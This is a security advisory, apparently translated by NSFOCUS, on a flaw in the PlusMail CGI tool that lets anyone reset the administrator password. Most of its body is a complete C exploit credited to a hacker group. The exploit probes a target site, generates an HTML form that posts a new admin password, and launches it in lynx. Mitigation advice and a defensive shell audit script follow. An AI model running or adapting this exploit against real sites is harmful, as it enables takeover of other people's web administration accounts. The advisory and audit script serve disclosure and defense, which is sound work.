PlusMail Password Security Vulnerability

Published: 2000-01-17
Updated: 2000-01-17

Affected systems:
PowerScripts PlusMail
Description:
PowerScripts PlusMail (<http://www[dot]sammons[dot]com/plusmail.html>) is a very popular CGI-based administration tool that manages a web site through a graphical control interface. The product was found to contain a flaw that allows an attacker to change the administrator password without knowing the current administrator password.

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users bear the risk themselves!

/*

[gH-plus.c]

title: [gH plusmail vulnerability]
date: 01.20.2000
author: ytcracker of gH [phed@felons.org]
comments: plusmail is an extremely popular cgi-based administration tool
that allows you to take control of your website with a graphical control
panel interface.  the password file, however, is set with permissions rw
enabled, therefore granting the authority to change the password
whenever's clever.
the following code will detect the vulnerability and generate the required
html to exploit. shouts: seven one nine.  all of gH.
www.mp3.com/category5. herf@ghettophreaks.org for finding vulnerability.

fix: Move/rename the PlusMail directory as a temporary fix.

*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int argc, char *argv[])
{
    int sock;
    ssize_t n;
    struct sockaddr_in sin;
    struct hostent *he;
    char *detect;
    char buffer[1024];
    char plusvuln[] = "GET /cgi-bin/plusmail HTTP/1.0\n\n";
    char htmI[] = "<html><head><title>[gH plusmail exploit]</title></head><form action=\"http://";
    char htmII[] = "/cgi-bin/plusmail\" method=\"post\"><p>username: <input type=\"text\" name=\"username\">password: <input type=\"password\" name=\"password\">retype password: <input type=\"password\" name=\"password1\"></p><p><input type=\"submit\" name=\"new_login\" value=\"reset password\"></p></form><p><a href=\"http://pure-security.net\">Pure Security Networks</a></p></body></html>";
    FILE *html;

    printf("\n [gH plusmail exploit] [ytcracker] [phed@felons.org]\n");

    if (argc < 2) {
        printf(" usage: %s [vulnerable website]\n\n", argv[0]);
        exit(0);
    }

    if ((he = gethostbyname(argv[1])) == NULL) {
        herror("gethostbyname");
        exit(1);
    }

    sock = socket(AF_INET, SOCK_STREAM, 0);
    memset(&sin, 0, sizeof(sin));
    memcpy(&sin.sin_addr, he->h_addr, he->h_length);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(80);

    if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
        perror("connect");
        exit(1);
    }

    /* The check is only whether /cgi-bin/plusmail exists: a "404" in the
       reply is taken to mean the script is not present. */
    send(sock, plusvuln, strlen(plusvuln), 0);
    n = recv(sock, buffer, sizeof(buffer) - 1, 0);
    buffer[n > 0 ? n : 0] = '\0';   /* terminate before strstr() */
    detect = strstr(buffer, "404");
    close(sock);

    if (detect != NULL) {
        printf(" vulnerability not detected.\n");
        exit(0);
    }
    printf(" vulnerability detected.  generating html...\n");

    html = fopen("plus.html", "w+b");
    if (html == NULL) {
        perror("fopen");
        exit(1);
    }
    fprintf(html, "%s", htmI);
    fprintf(html, "%s", argv[1]);
    fprintf(html, "%s", htmII);
    fclose(html);

    printf(" spawning lynx...\n");

    system("lynx plus.html");
    return 0;
}

Recommendations:
1. Move/rename the PlusMail directory.
2. Add password protection to that directory.
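An audit helper for the two conditions this advisory ties to the flaw: a password file in the PlusMail directory that is writable by group or others, and a directory that carries no .htaccess protection as recommended above. This is an added example, not code from the advisory or from PlusMail; the directory path is an assumption and is passed as the first argument.

```sh
#!/bin/sh
# Audit helper for a PlusMail CGI directory (added example, not part of
# this advisory or of PlusMail). It reports group/world-writable files,
# because a writable password file is the root cause described above, and
# reports a missing .htaccess, because the directory is then not
# password-protected. The directory to audit is an assumption given as $1.

# audit_plusmail_dir DIR
# Prints one finding per line; returns 0 when nothing is found, 1 otherwise.
audit_plusmail_dir() {
    dir=$1
    status=0
    if [ ! -d "$dir" ]; then
        echo "NO_SUCH_DIR: $dir"
        return 1
    fi
    # Every regular file (including dot files) writable by group or others
    # is a finding; -perm -002 / -020 test the exact permission bits rather
    # than the current user's access.
    for f in "$dir"/* "$dir"/.[!.]*; do
        [ -f "$f" ] || continue
        if [ -n "$(find "$f" -perm -002 -o -perm -020 2>/dev/null)" ]; then
            echo "WRITABLE: $f"
            status=1
        fi
    done
    # Without an .htaccess the CGI directory itself has no password protection.
    if [ ! -f "$dir/.htaccess" ]; then
        echo "NO_HTACCESS: $dir"
        status=1
    fi
    return $status
}

# Run only when a directory argument is given.
if [ $# -gt 0 ]; then
    audit_plusmail_dir "$1"
fi
```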

This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.